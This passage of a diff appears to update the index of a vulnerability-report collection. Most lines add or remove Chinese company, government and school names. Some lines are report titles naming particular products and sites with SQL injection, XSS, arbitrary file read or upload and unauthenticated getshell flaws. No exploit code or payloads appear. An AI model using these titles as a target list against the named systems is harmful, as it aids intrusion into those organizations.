西安建设工程交易中心 西安旅游股份有限公司 +西安曲江文化产业投资 西安泽瑞通信有限公司 西安理工大学高科学院 西安科技产业发展中心 @@ -27769,6 +27765,7 @@ zstu 西陇科学股份有限公司 誉杰管理咨询有限公司 许继电气股份有限公司 +诚迈科技股份有限公司 诺力机械股份有限公司 诺安基金管理有限公司 诺德投资股份有限公司 @@ -27789,6 +27786,7 @@ zstu 贵州轮胎股份有限公司 贵州钢绳股份有限公司 贵研铂业股份有限公司 +贵阳城市轨道交通公司 贵阳市公安交通管理局 贵阳市市场监督管理局 贵阳市道路运输管理局 @@ -27796,6 +27794,7 @@ zstu 贺州市市场监督管理局 贺州市平桂区人民政府 资阳市质量技术监督局 +赛勉管理咨询有限公司 赛摩电气股份有限公司 赛轮集团股份有限公司 赣南卫生健康职业学院 @@ -27828,6 +27827,7 @@ zstu 辽宁石油化工大学网站 辽宁社保网上办事大厅 辽宁税务高等专科学校 +辽宁经济管理干部学院 达州市人民政府门户网 达州市工商行政管理局 迅鳐成都科技有限公司 @@ -27885,6 +27885,7 @@ zstu 郑州轨道交通有限公司 郑州金地饲料有限公司 郑州银行股份有限公司 +酒泉钢铁有限责任公司 重庆万泽科技有限公司 重庆东盛科技有限公司 重庆交通行政执法总队 @@ -27897,6 +27898,7 @@ zstu 重庆大学电气工程学院 重庆安全技术职业学院 重庆安运科技有限公司 +重庆对外经贸有限公司 重庆工商大学派斯学院 重庆工程职业技术学院 重庆市北碚区人民政府 @@ -27933,6 +27935,7 @@ zstu 重庆银行股份有限公司 重庆青年职业技术学院 重药控股股份有限公司 +金丰机械工业有限公司 金亚科技股份有限公司 金健米业股份有限公司 金典商标代理有限公司 @@ -27953,6 +27956,7 @@ zstu 金科环境股份有限公司 金立通信设备有限公司 金能科技股份有限公司 +金花企业股份有限公司 金融服务软件有限公司 金轮科创股份有限公司 金轮蓝海股份有限公司 @@ -27995,6 +27999,7 @@ zstu 长春水务集团有限公司 长春汉邦管理培训中心 长春燃气股份有限公司 +长春经开股份有限公司 长春绿园融泰村镇银行 长春绿源融泰村镇银行 长春金融高等专科学校 @@ -28023,6 +28028,7 @@ zstu 阳江市人民政府办公室 阳泉市公共资源交易网 阳泉市市政工程管理局 +阳泉煤业股份有限公司 阳煤化工股份有限公司 阿鲁科尔沁政府文明网 际华集团股份有限公司 @@ -28033,6 +28039,7 @@ zstu 陕西师范大学附属小学 陕西康惠制药有限公司 陕西建工集团有限公司 +陕西文化产业投资控股 陕西煤业股份有限公司 陕西省中小企业促进局 陕西省人民政府办公厅 @@ -28049,14 +28056,13 @@ zstu 陕西邮电职业技术学院 陕西重型汽车有限公司 隆基泰和实业有限公司 -雀巢(中国)有限公司 +隐马健康科技有限公司 雄安集团档案管理系统 雅安市中小企业服务网 雅本化学股份有限公司 雅莹集团股份有限公司 雪龙集团股份有限公司 震安科技股份有限公司 -震旦(中国)有限公司 露笑科技股份有限公司 青岛三利集团有限公司 青岛丽东化工有限公司 @@ -28101,16 +28107,18 @@ zstu 顾地科技股份有限公司 顾家家居股份有限公司 风神轮胎股份有限公司 +首家电子商务有限公司 首汽租赁有限责任公司 首约科技有限责任公司 首都师大附中昌平学校 香港中文大学深圳校区 -香港中文大学(深圳) +马鞍山市工商业联合会 骅威文化股份有限公司 骆驼集团股份有限公司 高中毕业证样本信息网 高升控股股份有限公司 高等教育干部培训平台 +高等教育文献保障系统 高视医疗科技股份公司 高速稽查业务管理系统 鲁商置业股份有限公司 @@ -28122,8 +28130,10 @@ zstu 鹏华基金管理有限公司 鹏都农牧股份有限公司 鹏鹞环保股份有限公司 +鹏鼎控股股份有限公司 鹤岗市市场监督管理局 鹭燕医药股份有限公司 +鹭燕药业股份有限公司 鹿邑老子文化研发中心 麒盛科技股份有限公司 麻城市广播电影电视局 @@ -28162,35 +28172,19 @@ zstu 龙星化工股份有限公司 龙洲集团股份有限公司 龙湾区大数据管理中心 -国都证券股份有限公司 -山东大学附属生殖医院 因酷时代在线教育系统 V2.0.6前台存储型xss漏洞 因酷开源网校系统源码 v2.0.6前台存在sql注入漏洞 因酷开源网校系统源码 v2.0.6前台无限制getshell漏洞 -因酷开源网校系统源码 v2.0.6前台无限制getshell漏洞(二) -档案资源智能管理系统 v8.0 - Cookie欺骗(可登录任意用户) +档案资源智能管理系统 v8.0 - Cookie欺骗 全国文化信息共享工程 苏州市相城区支中心 杭州米洛科技有限公司<简称:KK唱响> -艾艾精密工业输送系统(上海) -上海微创心脉医疗科技(集团)股份有限公司 -宝大祥青少年儿童购物(集团)股份有限公司 -畅越飞平有色金属储运(上海)股份有限公司 -艾艾精密工业输送系统(上海)股份有限公司 -马鞍山市工商业联合会(总商会) -贵阳城市轨道交通公司(贵阳地铁) -安吉县综合行政执法局(城市管理局)智慧党建平台 -内蒙古自治区扶贫开发(革命老区建设)办公室 寰创产品任意文件遍历+获取用户名与密码 杭州欢创科技有限公司-APP通用逻辑漏洞 安徽涉外经济职业学院-教务处 安徽邮电职业技术学院-学生处 广元市朝天区信息中心-部门信箱 -得实信息科技有限公司-得实软件(DASCOM)文件上传getshell 中国人民政治协商会议-曲阜市委员会 -新闻媒体系统文件读取/目录列表 -新闻媒体系统文件读取/目录列表2 -新闻媒体系统文件读取/目录列表3 -延安市网上群众工作(12345智慧政务服务、社情民意调查)中心 +得实信息科技有限公司-得实软件文件上传getshell 中共商洛市委组织部“12380”举报网站 中共滨城区委组织部“12380”在线举报网 采购系统任意文件下载2 @@ -28200,9 +28194,9 @@ zstu 巢湖水环境智能监管及GIS系统 采购系统任意文件上传Getshell 和达科技智慧水务系统SQL注入漏洞 -德派软件专家访问系统SQL注入漏洞/后台任意文件上传 +德派软件专家访问系统SQL注入漏洞 易龙科技建站系统存在SQL注入第二弹 -巨泰能源信息管理系统V5.0存在通用型SQL注入漏洞/可UNION +巨泰能源信息管理系统V5.0存在通用型SQL注入漏洞 登录到奉贤区教育系统oa平台 有道网络建站公司通用sql注入 宏天软件开发平台存在sql注入1 @@ -28252,6 +28246,7 @@ zstu 上海市崇明区环境保护局 上海市工程技术管理学校 上海市建筑施工行业协会 +上海市教师教育管理平台 上海市浦东新区人民政府 上海市疾病预防控制中心 上海市老年教育信息中心 @@ -28269,6 +28264,7 @@ zstu 上海新南洋股份有限公司 上海来伊份股份有限公司 上海柴油机股份有限公司 +上海永冠众诚新材料科技 上海环球金融中心观光厅 上海疾病预防和控制中心 上海稳利达电气有限公司 @@ -28323,6 +28319,7 @@ zstu 中国人民革命军事博物馆 中国保险资产管理业协会 中国儿童福利和收养中心 +中国全聚德股份有限公司 中国北京保护知识产权网 中国十七冶集团有限公司 中国十九冶集团有限公司 @@ -28421,6 +28418,7 @@ zstu 井研县人民政府门户网站 亚洲东方实验室服务平台 京师杏林中国医学教育网 +人人贷商务顾问有限公司 人民卫生出版社有限公司 亿嘉和科技股份有限公司 今麦郎饮品股份有限公司 @@ -28429,6 +28427,7 @@ zstu 伊春市公共资源交易中心 伊春市农业信息中心网站 众业达电气股份有限公司 +优利德科技股份有限公司 优刻得科技股份有限公司 会通新材料股份有限公司 伟力通电子技术有限公司 @@ -28440,10 +28439,11 @@ zstu 佛山市承林家具有限公司 佛山市禅城区文沙幼儿园 佛山欧神诺陶瓷有限公司 +佰思通办公用品有限公司 +保利房地产股份有限公司 保定市发展和改革委员会 保网保险交易与服务平台 保龄宝生物股份有限公司 -信用中国(河南平顶山) 信誉楼百货集团有限公司 信雅达科技股份有限公司 倍加洁集团股份有限公司 @@ -28470,6 +28470,7 @@ zstu 内蒙古广播电视大学网站 内蒙古建筑职业技术学院 内蒙古机电职业技术学院 +内蒙古电力有限责任公司 内蒙古经贸外语职业学院 内蒙古自治区交通运输厅 内蒙古自治区人民检察院 @@ -28577,7 +28578,6 @@ zstu 南京市莫愁中等专业学校 南京市规划与自然资源局 南京市雨花台区人民政府 -南京港(集团)有限公司 南京百江液化气有限公司 南京红太阳股份有限公司 南京红宝丽股份有限公司 @@ -28633,10 +28633,10 @@ zstu 周大生珠宝首饰有限公司 呼和浩特工商行政管理局 和县安全生产监督管理局 +和家网信息技术有限公司 和龙市政务服务中心网站 咸阳市政务信息化办公室 哈尔滨工业大学管理学院 -哈尔滨工业大学(威海) 哈尔滨市人民防空办公室 哈尔滨市尚志市人民政府 哈尔滨市红十字中心医院 @@ -28665,7 +28665,6 @@ zstu 四川泸天化股份有限公司 四川爱迪讯科技有限公司 四川省乐山市地方海事局 -四川省人民医院(东院) 四川省住房和城乡建设厅 四川省公安厅交通管理局 四川省农村科技发展中心 @@ -28693,15 +28692,17 @@ zstu 国家许昌经济技术开发区 国家质检总局质量承诺网 国政通科技股份有限公司 +国旅国际旅行社有限公司 国联安基金管理有限公司 图立方影视器材有限公司 -圣罗兰(广州)有限公司 +圣邦微电子股份有限公司 地平线网站内容管理系统 垦利县网上信访受理平台 壹百分儿童产品有限公司 多喜爱家纺股份有限公司 多喜爱集团股份有限公司 多氟多化工股份有限公司 +大中华国际集团有限公司 大冶特殊钢股份有限公司 大同市网宿科技有限公司 大安市住房和城乡建设局 @@ -28718,6 +28719,7 @@ zstu 天水市公共资源交易中心 天水食品药品监督管理局 天津农学院会计专业硕士 +天津劝业场股份有限公司 天津大中专就业指导中心 天津市残疾人福利基金会 天津市海运股份有限公司 @@ -28846,6 +28848,7 @@ zstu 山东鲁能泰山足球俱乐部 山西人民检察院举报中心 山西省住房和城乡建设厅 +山西省公共资源交易中心 山西省公安厅交通管理局 山西省发展和改革委员会 山西省吕梁高等专科学校 @@ -28867,7 +28870,6 @@ zstu 常州市卫生和计划委员会 常州市新北区龙虎塘中学 常州经济开发区人民法院 -常春藤教育(中国)官网 常熟雷允上制药有限公司 平原县教育资源服务平台 平阴县职业中等专业学校 @@ -28877,6 +28879,7 @@ zstu 广东中照网传媒有限公司 广东农工商职业技术学院 广东利家居陶瓷有限公司 +广东广物房地产有限公司 广东新风景陶瓷有限公司 广东村村通科技有限公司 广东来德利陶瓷有限公司 @@ -29033,10 +29036,11 @@ zstu 拉卡拉支付股份有限公司 招商局公路网络科技控股 招商局积余产业运营服务 -捷安特(昆山)有限公司 +掌上通航空服务有限公司 控客智能灯远程控制漏洞 搜于特集团股份有限公司 攀枝花市第七高级中学校 +支付宝信息技术有限公司 政协广元市昭化区委员会 教育部全国青少年普法网 教育部基础教育资源中心 @@ -29078,7 +29082,6 @@ zstu 无锡市住房和城乡建设局 无锡市惠山区人民检察院 无锡新洁能股份有限公司 -无限极(中国)有限公司 日照市开发区社会事业局 日照环境保护局东港分局 日照职业技术学院商学院 @@ -29090,7 +29093,6 @@ zstu 昆明康辉旅行社官方网站 昌吉回族自治州人民政府 明冠新材料股份有限公司 -易乐游(易游)网娱平台 易事特集团股份有限公司 易方达基金管理有限公司 易网络数据服务有限公司 @@ -29100,6 +29102,7 @@ zstu 晋中市规划和城市管理局 晋城市人民政府信息公开 景騰多媒體股份有限公司 +晶晨半导体股份有限公司 曼卡龙珠宝股份有限公司 有研新材料股份有限公司 有色金属技术经济研究院 @@ -29122,10 +29125,10 @@ zstu 桐城市住房和城乡建设局 桦南县网上政务服务中心 梁山县公共资源交易中心 +梁黄顾建筑设计有限公司 梅州路由侠科技有限公司 模式识别国家重点实验室 欣旺达电子股份有限公司 -欧莱雅(中国)有限公司 欧菲光集团股份有限公司 武汉光谷联合产权交易所 武汉城市一卡通有限公司 @@ -29294,6 +29297,7 @@ zstu 海南省建设集团有限公司 海南省涉侨事务咨询部门 海南省自然资源和规划厅 +海口农工贸股份有限公司 海口市公共资源交易中心 海口综合保税区门户网站 海能达通信股份有限公司 @@ -29323,6 +29327,7 @@ zstu 深圳市中燃科技有限公司 深圳市中金岭南有色金属 深圳市丰巢科技有限公司 +深圳市人力资本有限公司 深圳市人才集团有限公司 深圳市今天国际物流技术 深圳市优网科技有限公司 @@ -29340,6 +29345,8 @@ zstu 深圳市双梦科技有限公司 深圳市台信电子有限公司 深圳市商城众网有限公司 +深圳市天健股份有限公司 +深圳市天地股份有限公司 深圳市定点咨询有限公司 深圳市宝安区建设信息网 深圳市宝鹰建设控股集团 @@ -29353,6 +29360,7 @@ zstu 深圳市悍马经贸有限公司 深圳市戴瑞珠宝有限公司 深圳市才酷网络有限公司 +深圳市振业股份有限公司 深圳市易仓科技有限公司 深圳市易创顾问有限公司 深圳市普路通供应链管理 @@ -29362,12 +29370,14 @@ zstu 深圳市杨程商贸有限公司 深圳市沃森科技有限公司 深圳市浩天装饰有限公司 +深圳市特力股份有限公司 深圳市瑞萦传媒有限公司 深圳市百米生活有限公司 深圳市移卡科技有限公司 深圳市米尔科技有限公司 深圳市粮食集团有限公司 深圳市纬地科技有限公司 +深圳市纺织股份有限公司 深圳市网旭科技有限公司 深圳市美晶科技有限公司 深圳市美芝装饰设计工程 @@ -29461,6 +29471,7 @@ zstu 爱司凯科技股份有限公司 爱在这儿大型征婚交友网 爱客仕网络科技有限公司 +爱爱网电子商务有限公司 獐子岛集团股份有限公司 玉林机动车驾驶培训中心 王府井集团股份有限公司 @@ -29479,10 +29490,12 @@ zstu 甘肃省广播电影电视总台 甘肃省疾病预防控制中心 甘肃省白银市党建工作部 +生活家家居装饰有限公司 用友建筑云服务有限公司 白城市房屋产权管理中心 白色市平果县教育信息网 百合花集团股份有限公司 +百富计算机技术有限公司 百色市右江区人民政府网 百草堂医药股份有限公司 盈方微电子股份有限公司 @@ -29514,6 +29527,7 @@ zstu 福建省学生资助管理中心 福建省宁德市福安纪检委 福建省湄洲湾港口管理局 +科乐得技术股份有限公司 科博达技术股份有限公司 科立讯通信股份有限公司 秦皇岛东易科技有限公司 @@ -29522,6 +29536,7 @@ zstu 积石山县纪律监察委员会 第一拖拉机股份有限公司 第十九届国际石材展览会 +米勒贝姆振动与声学系统 索菲亚家居股份有限公司 红宝丽集团股份有限公司 绥芬河市市场监督管理局 @@ -29545,6 +29560,7 @@ zstu 舟山市特种设备管理系统 舟山市自然资源和规划局 芜湖伯特利汽车安全系统 +芯原微电子股份有限公司 花样年控股集团有限公司 苏交科集团股份有限公司 苏州工业园区管理委员会 @@ -29555,6 +29571,7 @@ zstu 苏州市相城区阳澄驿站网 苏州苏福马机械有限公司 英洛华科技股份有限公司 +英飞特电子股份有限公司 茂名市农产品价格信息网 茂名市展翅科技有限公司 茂名市电白区人民检察院 @@ -29568,7 +29585,6 @@ zstu 营口市西市区教育信息网 葫芦岛锌业股份有限公司 蓝星安迪苏股份有限公司 -蓝月亮(中国)有限公司 蓬莱市网上信访受理平台 藍色空間文化事業出版社 行唐县党政移动办公系统 @@ -29582,7 +29598,6 @@ zstu 西安德雅通科技有限公司 西安高新第一小学图书馆 西藏林芝市巴宜区食药局 -西门子(中国)有限公司 谷秋精品资源共享课软件 贡井区人民政府政务中心 贵州志为信科技有限公司 @@ -29615,6 +29630,7 @@ zstu 辽阳市人民政府门户网站 达州市人民政府市长热线 达州市发展和改革委员会 +远光能源互联网产业发展 连云港市机关事务管理局 连云港市海州区人民政府 连云港市赣榆区人民政府 @@ -29643,6 +29659,7 @@ zstu 重庆市社会科学界联合会 重庆市福利彩票发行中心 重庆市第一中级人民法院 +重庆市轨道交通有限公司 重庆新沁园食品有限公司 重庆易极付科技有限公司 重庆渝开发股份有限公司 @@ -29705,9 +29722,9 @@ zstu 雅戈尔集团股份有限公司 雷允上药业集团有限公司 震泽镇网上党员服务中心 +青岛市大数据发展促进局 青岛市福利彩票发行中心 青岛港国际股份有限公司 -青岛港(集团)有限公司 青岛热立达热力有限公司 青岛西海岸商品交易中心 青川县人民政府政务中心 @@ -29732,6 +29749,7 @@ zstu 鹤壁市住房和城乡建设局 鹤山市住房和城乡建设局 麦趣尔集团股份有限公司 +黄河水利水电开发总公司 黄石市公共资源交易中心 黄石市西塞山区人民政府 黑河市人力与资源保障局 @@ -29764,30 +29782,24 @@ zstu 齐齐哈尔市社会信用网站 龙岩高岭土股份有限公司 龙胜各族自治县人民政府 -上海永冠众诚新材料科技(集团) -上海永冠众诚新材料科技(集团)股份有限公司 -上海市教师教育管理平台(十三五) -石家庄邮电职业技术学院(中国邮政集团公司培训中心) 合肥房地产家居门户网站-365淘房 内蒙古自治区新华阿拉善-智慧党建 天津市舒川科贸有限公司-企业侧综合管理平台 -深圳一电科技有限公司(AEE) -高等教育文献保障系统(CALIS)管理中心 中国地质大学校园地图及GIS平台 复旦天翼缴费平台通用型SQL注入 某分类信息系统某处存在SQL注入 框分类信息系统前台一处SQL注入 框分类信息系统前台一处SQL注入#2 +企智通上网行为管理通用SQL注入漏洞 华夏化工网建站系统存在SQL注入漏洞 斌网网络技术服务部存在SQL注入漏洞 -企智通上网行为管理通用SQL注入漏洞(无需登录) 易龙建站系统某处存储型XSS 齐博新闻系统发表文章处XSS 后勤宝留言板存在存储型XSS漏洞 深圳市中网互联建站系统about.php页面存在SQL注入 北京润乾信息系统又一处getshell 西安广播电视大学漏洞可getshell -通用办公云系统无需登录getshell/2 +通用办公云系统无需登录getshell 新闻媒体系统前台一步步getshell2 新闻媒体系统前台一步步getshell3 新闻媒体系统前台一步步getshell4 @@ -29812,11 +29824,13 @@ zstu 三川智慧科技股份有限公司 三明市行政服务中心管委会 三明市食品药品监督管理局 -三樱包装(江苏)有限公司 +三生国健药业股份有限公司 三诺生物传感股份有限公司 上海七牛信息技术有限公司 上海万业企业股份有限公司 上海万户网络技术有限公司 +上海三毛企业股份有限公司 +上海东方明珠股份有限公司 上海东淼信息技术有限公司 上海丫丫信息科技有限公司 上海中西药业股份有限公司 @@ -29856,6 +29870,7 @@ zstu 上海公兴搬场物流有限公司 上海冰鉴信息科技有限公司 上海凡迪生物科技有限公司 +上海凤凰企业股份有限公司 上海凭安网络科技有限公司 上海凯宝药业股份有限公司 上海创力集团股份有限公司 @@ -29887,12 +29902,12 @@ zstu 上海商创网络科技有限公司 上海商派网络科技有限公司 上海国际机场股份有限公司 +上海国际港务股份有限公司 上海城地建设股份有限公司 上海城建置业发展有限公司 上海城投控股股份有限公司 -上海城投(集团)有限公司 上海墅假网络科技有限公司 -上海外服(集团)有限公司 +上海复星医药股份有限公司 上海大屯能源股份有限公司 上海天玑科技股份有限公司 上海奇峰科技发展有限公司 @@ -29925,6 +29940,7 @@ zstu 上海帆测科技发展有限公司 上海师悦信息科技有限公司 上海广拓信息技术有限公司 +上海广电电气股份有限公司 上海建工集团股份有限公司 上海开开实业股份有限公司 上海开放大学徐汇财贸分校 @@ -29946,6 +29962,7 @@ zstu 上海技聚网络科技有限公司 上海拜石实业发展有限公司 上海挑卡网络科技有限公司 +上海振华重工股份有限公司 上海提捺信息科技有限公司 上海摩恩电气股份有限公司 上海摩诃网络科技有限公司 @@ -30133,9 +30150,9 @@ zstu 上海鸣志电器股份有限公司 上海龙宇燃油股份有限公司 上讯信息技术股份有限公司 -世界直销(中国)研究中心 世纪互联数据中心有限公司 世纪凯歌医疗科技有限公司 +世纪闻康科技发展有限公司 东侨经济技术开发区财政局 东信和平科技股份有限公司 东北制药集团股份有限公司 @@ -30155,6 +30172,7 @@ zstu 东方财富信息股份有限公司 东方闻道科技发展有限公司 东旭光电科技股份有限公司 +东来涂料技术股份有限公司 东沣科技集团股份有限公司 东洋医疗咨询顾问有限公司 东港安全印刷股份有限公司 @@ -30207,7 +30225,9 @@ zstu 中共锦州市记录检查委员会 中共鸡西市纪律检查委员会 中关村国家自主创新示范区 +中兴天恒能源科技股份公司 中再资源环境股份有限公司 +中农网购电子商务有限公司 中冶联合国际贸易有限公司 中化岩土工程股份有限公司 中化岩土集团股份有限公司 @@ -30220,6 +30240,7 @@ zstu 中原大地传媒股份有限公司 中国—亚欧博览会展览布展 中国东方航空股份有限公司 +中国中建设计集团有限公司 中国中期投资股份有限公司 中国中煤能源股份有限公司 中国中铁四局集团有限公司 @@ -30229,7 +30250,6 @@ zstu 中国五洲工程设计有限公司 中国交通建设股份有限公司 中国人寿保险股份有限公司 -中国人寿保险(集团)公司 中国人民大学书报资料中心 中国人民大学公共管理学院 中国人民政协无为县委员会 @@ -30251,6 +30271,7 @@ zstu 中国南玻集团股份有限公司 中国卫通集团股份有限公司 中国商用飞机有限责任公司 +中国嘉陵工业股份有限公司 中国国机重工集团有限公司 中国国际期货股份有限公司 中国国际航空股份有限公司 @@ -30266,12 +30287,14 @@ zstu 中国就业培训技术指导中心 中国工商银行数据中心网站 中国工商银行股份有限公司 +中国平安保险股份有限公司 中国广核电力股份有限公司 中国建筑书店有限责任公司 中国建筑材料科学研究总院 中国建筑材料集团有限公司 中国建设银行股份有限公司 中国招标投标公共服务平台 +中国振华科技股份有限公司 中国机械工业集团有限公司 中国林业产业数据上报系统 中国核能电力股份有限公司 @@ -30301,6 +30324,8 @@ zstu 中国石油化工股份有限公司 中国石油化工集团有限公司 中国石油和化学工业联合会 +中国石油大学克拉玛依校区 +中国石油大学石油工程学院 中国神华能源股份有限公司 中国科学技术期刊编辑学会 中国科学院南京土壤研究所 @@ -30308,7 +30333,6 @@ zstu 中国科学院计算技术研究所 中国科学院高能物理研究所 中国移动通信集团广西公司 -中国移动(深圳)有限公司 中国第一重型机械股份公司 中国绍兴黄酒集团有限公司 中国联合水泥集团有限公司 @@ -30376,13 +30400,13 @@ zstu 中百控股集团股份有限公司 中矿资源勘探股份有限公司 中矿资源集团股份有限公司 +中福海峡发展股份有限公司 中科创达软件股份有限公司 中科遥感科技集团有限公司 中粮屯河糖业股份有限公司 中粮生物科技股份有限公司 中粮糖业控股股份有限公司 中粮资本控股股份有限公司 -中缆科技(广州)有限公司 中航光电科技股份有限公司 中航安盟财产保险有限以司 中航安盟财产保险有限公司 @@ -30406,7 +30430,6 @@ zstu 中铁二十一局集团有限公司 中铁二十四局集团有限公司 中铁二十四局集团桥路公司 -中铁五局(集团)有限公司 中铁电气化局集团有限公司 中铁高新工业股份有限公司 中铝国际工程有限责任公司 @@ -30435,6 +30458,8 @@ zstu 乐山创艺网络科技有限公司 乐山巨星农牧股份有限公司 乐山市住房公积金管理中心 +乐普医疗器械股份有限公司 +乐鑫信息科技股份有限公司 九江公众信息产业有限公司 云南云龙制药股份有限公司 云南城投置业股份有限公司 @@ -30460,11 +30485,11 @@ zstu 云浮市以及辖区内信访系统 云顶信息技术股份有限公司 五洋建设集团股份有限公司 -亚信科技(中国)有限公司 亚光科技集团股份有限公司 +亚士创能科技股份有限公司 亚宝药业集团股份有限公司 亚普汽车部件股份有限公司 -亨特陶业(中国)有限公司 +亚钾国际投资股份有限公司 京华信息科技股份有限公司 京汉实业投资股份有限公司 京沪高速铁路股份有限公司 @@ -30472,8 +30497,6 @@ zstu 人文社会科学研究管理平台 亿晶光电科技股份有限公司 亿联网络技术股份有限公司 -亿腾医药(中国)有限公司 -仁和(集团)发展有限公司 仙乐健康科技股份有限公司 伊利实业集团股份有限公司 伊金霍洛旗人民政府办公室 @@ -30481,8 +30504,9 @@ zstu 众应互联科技股份有限公司 众能联合数字技术有限公司 众诚汽车保险股份有限公司 +优客逸家信息科技有限公司 +优德精密工业股份有限公司 会稽山绍兴酒股份有限公司 -伽蓝(集团)股份有限公司 体育之窗文化股份有限公司 佛山云迈电子商务有限公司 佛山华新包装股份有限公司 @@ -30499,7 +30523,6 @@ zstu 佳禾智能科技股份有限公司 佳都新太科技股份有限公司 供销大集集团股份有限公司 -依波精品(深圳)有限公司 侨银城市管理股份有限公司 侨银环保科技股份有限公司 信泰人寿保险股份有限公司 @@ -30511,13 +30534,13 @@ zstu 先锋太盟融资租赁有限公司 光大永明人寿保险有限公司 光大金控资产管理有限公司 -光明食品(集团)有限公司 全国中小学教师继续教育网 全国中小学智慧教育云平台 全国儿童福利信息管理系统 全国学生资助管理信息系统 全国益农社运营服务总平台 全国高校教师网络培训中心 +全通教育集团股份有限公司 公安县农村经济经营管理局 六安市公安局交通警察支队 六盘水市发展和改革委员会 @@ -30551,8 +30574,8 @@ zstu 冰轮环境技术股份有限公司 凤城市食品药品监督管理局 凯撒同盛发展股份有限公司 -凯新认证(北京)有限公司 创业慧康科技股份有限公司 +创业黑马科技股份有限公司 创意信息技术股份有限公司 创新医疗管理股份有限公司 创智信息科技股份有限公司 @@ -30560,6 +30583,7 @@ zstu 利安人寿保险股份有限公司 利民控股集团股份有限公司 利群商业集团股份有限公司 +前沿生物药业股份有限公司 前海人寿保险股份有限公司 加加食品集团股份有限公司 勤智数码科技股份有限公司 @@ -30680,6 +30704,7 @@ zstu 北京嘉德在线拍卖有限公司 北京嘶吼文化传媒有限公司 北京国都信业科技有限公司 +北京城乡商业股份有限公司 北京城市联盟科技有限公司 北京城建集团有限责任公司 北京声迅电子股份有限公司 @@ -30885,6 +30910,8 @@ zstu 北京飞流九天科技有限公司 北京飞马互联科技有限公司 北京首商集团股份有限公司 +北京首旅酒店股份有限公司 +北京首都开发控股有限公司 北京首都开发股份有限公司 北京首钢建设集团有限公司 北京香哈网络股份有限公司 @@ -30918,6 +30945,7 @@ zstu 华夏幸福基业股份有限公司 华天酒店集团股份有限公司 华安财产保险股份有限公司 +华安鑫创控股股份有限公司 华工科技产业股份有限公司 华平信息技术股份有限公司 华数传媒控股股份有限公司 @@ -30930,28 +30958,29 @@ zstu 华润三九医药股份有限公司 华润双鹤药业股份有限公司 华润湖南双舟医药有限公司 -华润燃气(集团)有限公司 华熙生物科技股份有限公司 华电国际电力股份有限公司 -华硕电脑(上海)有限公司 华福基金管理有限责任公司 华美兴泰科技股份有限公司 华耐立家电子商务有限公司 华能国际电力股份有限公司 +华菱星马汽车股份有限公司 华融湘江银行股份有限公司 华西能源工业股份有限公司 华设设计集团股份有限公司 华谊兄弟传媒股份有限公司 +华辰精密装备股份有限公司 华达汽车科技股份有限公司 华邦生命健康股份有限公司 +华锐风电科技股份有限公司 华青融天技术股份有限公司 协创数据技术股份有限公司 协鑫能源科技股份有限公司 协鑫集成科技股份有限公司 -协鑫(集团)控股有限公司 卓越里程教育科技有限公司 卓郎智能技术股份有限公司 南京上为信息技术有限公司 +南京中央商场股份有限公司 南京中科集团股份有限公司 南京亚派科技股份有限公司 南京公用发展股份有限公司 @@ -31025,6 +31054,8 @@ zstu 博士眼镜连锁股份有限公司 博天环境集团股份有限公司 博库网络传媒集团有限公司 +博瑞生物医药股份有限公司 +博通集成电路股份有限公司 卧龙地产集团股份有限公司 卧龙控股集团国际贸易公司 卧龙电气集团股份有限公司 @@ -31123,11 +31154,9 @@ zstu 吉林金浦钛业股份有限公司 吉林高速公路股份有限公司 吉祥人寿保险股份有限公司 -吉艾科技(北京)股份公司 吉药控股集团股份有限公司 同兴环保科技股份有限公司 同方全球人寿保险有限公司 -名展贸易(上海)有限公司 名臣健康用品股份有限公司 名艺名居古典家具有限公司 君康人寿保险股份有限公司 @@ -31143,6 +31172,7 @@ zstu 哈尔滨人力资源社会保障局 哈尔滨市住房和城乡建设局 哈尔滨电气集团佳木斯电机 +哈尔滨高科技股份有限公司 哈药集团三精制药有限公司 唐山三友化工股份有限公司 唐山三孚硅业股份有限公司 @@ -31150,10 +31180,8 @@ zstu 唐山市古冶区委员会组织部 唐山市曹妃甸区教育体育局 唐山汇中仪表股份有限公司 -唯马电机(上海)有限公司 善林金融信息服务有限公司 嗨皮网络科技股份有限公司 -嘀一科技(北京)有限公司 嘉兴市住房公积金管理中心 嘉兴市安全生产监督管理局 嘉兴教育资源公共服务平台 @@ -31161,6 +31189,7 @@ zstu 嘉友国际物流股份有限公司 嘉祥教育资源公共服务平台 嘉祥魅力网络科技有限公司 +嘉美食品包装股份有限公司 四三九九网络股份有限公司 四川万益能源科技有限公司 四川九洲电器股份有限公司 @@ -31221,6 +31250,7 @@ zstu 四川长虹电子集团有限公司 四川龙蟒集团有限责任公司 四方科技集团股份有限公司 +固高派动智能科技有限公司 国信招标集团股份有限公司 国元农业保险股份有限公司 国务院发展研究中心信息网 @@ -31264,9 +31294,7 @@ zstu 国药集团药业股份有限公司 圣湘生物科技股份有限公司 垒知控股集团股份有限公司 -域高科技(杭州)有限公司 基蛋生物科技股份有限公司 -夏普商贸(中国)有限公司 大亚圣象家居股份有限公司 大千生态景观股份有限公司 大博医疗科技股份有限公司 @@ -31314,7 +31342,6 @@ zstu 天山铝业集团股份有限公司 天峰普惠信息咨询有限公司 天意有福科技股份有限公司 -天格科技(杭州)有限公司 天水华天科技股份有限公司 天泽信息产业股份有限公司 天津一汽汽车销售有限公司 @@ -31368,6 +31395,7 @@ zstu 太原罗克佳华工业有限公司 太原财政金融职业中专学校 太原重型机械集团有限公司 +太龙商业照明股份有限公司 央视市场研究股份有限公司 奇瑞捷豹路虎汽车有限公司 奥园美谷科技股份有限公司 @@ -31378,6 +31406,8 @@ zstu 威海华东数控股份有限公司 威海市政府采购管理办公室 威胜信息技术股份有限公司 +媒体内容管理平台文件读取 +媒体采编系统任意文件读取 孝感市人民政府法制办公室 宁国菜鸟电子商务有限公司 宁夏东方钽业股份有限公司 @@ -31396,6 +31426,7 @@ zstu 宁波井贝电子商务有限公司 宁波公众信息产业有限公司 宁波华翔电子股份有限公司 +宁波启点教育科技有限公司 宁波均胜电子股份有限公司 宁波天龙电子股份有限公司 宁波宽易科技软件开发公司 @@ -31409,6 +31440,7 @@ zstu 宁波弘讯科技股份有限公司 宁波德业科技股份有限公司 宁波拓普集团股份有限公司 +宁波有道网络技术有限公司 宁波横河模具股份有限公司 宁波永新光学股份有限公司 宁波海天精工股份有限公司 @@ -31420,6 +31452,7 @@ zstu 宁波菲仕电机技术有限公司 宁波迅途信息技术有限公司 宁波邻家网络科技有限公司 +宁波金田铜业股份有限公司 宁波长阳科技股份有限公司 宁波震裕科技股份有限公司 宁阳县房地产信息管理平台 @@ -31465,6 +31498,7 @@ zstu 安徽恒源煤电股份有限公司 安徽新力金融股份有限公司 